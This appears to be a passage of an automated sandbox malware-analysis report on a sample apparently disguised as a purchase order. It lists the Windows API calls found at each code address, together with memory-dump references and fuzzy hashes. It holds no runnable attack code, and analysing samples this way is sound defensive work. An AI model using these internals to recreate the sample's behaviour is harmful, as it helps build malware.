                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3550944819-0
                                                                                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                      APIs
                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$free
                                                                                                      • String ID: g4@
                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                      • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1865533344-0
                                                                                                      • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                      • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1127616056-0
                                                                                                      • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                      • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: sqlite_master
                                                                                                      • API String ID: 438689982-3163232059
                                                                                                      • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                      • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                      APIs
                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3917621476-0
                                                                                                      • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                      • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 822687973-0
                                                                                                      • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                      • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2605342592-0
                                                                                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2678498856-0
                                                                                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Item
                                                                                                      • String ID:
                                                                                                      • API String ID: 3888421826-0
                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3727323765-0
                                                                                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                      • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 764393265-0
                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                      • String ID:
                                                                                                      • API String ID: 979780441-0
                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
